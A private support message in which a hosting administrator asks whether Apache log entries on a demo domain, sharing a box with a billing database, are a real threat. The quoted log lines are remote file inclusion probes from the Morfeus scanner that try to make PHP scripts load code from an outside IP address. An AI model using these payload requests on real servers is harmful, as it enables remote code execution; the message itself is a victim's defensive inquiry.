Hi,
I don't know if this is a bug, but I didn't want to put it on the public forum.
I have a demo reseller set up in read only. I've set up fake domains through the reseller dewy.com/ link.us, huey.com, luey.com/ screwy.luey.com for examples.
THe rub comes in that these are fake non-functioning domains yet with have Apache access log entries for dewy.com (first in the list) ie:
77.244.80.10 - - [13/Jan/2008:07:34:23 -0600] "GET /admin/kfm/initialise.php?kfm_base_path=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 301 "-" "Morfeus Fucking Scanner"
77.244.80.10 - - [13/Jan/2008:07:34:23 -0600] "GET /pmd_arcade_1_0_final/sources/libs/geoip/DNS/RR.php?phpdns_basedir=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 327 "-" "Morfeus Fucking Scanner"
77.244.80.10 - - [13/Jan/2008:07:34:24 -0600] "GET /admin/index.php?loadadminpage=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 292 "-" "Morfeus Fucking Scanner"
77.244.80.10 - - [13/Jan/2008:07:34:25 -0600] "GET /joomla/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 324 "-" "Morfeus Fucking Scanner"
77.244.80.10 - - [13/Jan/2008:07:34:25 -0600] "GET /config.inc.php?path_escape=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 291 "-" "Morfeus Fucking Scanner"
77.244.80.10 - - [13/Jan/2008:07:34:25 -0600] "GET /includes/tumbnail.php?config[root_ordner]=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 298 "-" "Morfeus Fucking Scanner"
77.244.80.10 - - [13/Jan/2008:07:34:26 -0600] "GET / HTTP/1.1" 403 3644 "-" "Morfeus Fucking Scanner"
77.244.80.10 - - [13/Jan/2008:07:34:26 -0600] "GET / HTTP/1.1" 403 3644 "-" "Morfeus Fucking Scanner"
They don't appear to result in a breakin but I'm concerned that they can make a call in the first place. Dewy.com resolves elsewhere for someone else.
This is the same box as our AWBS software resides making only AWBS and the reseller account as VM principles. My concern is that this is where the billing database resides. I don't even have BIND allowing slave records on this box.
Is this a real concern or are those just benign attacks against an IP address hoping that PHP is loose.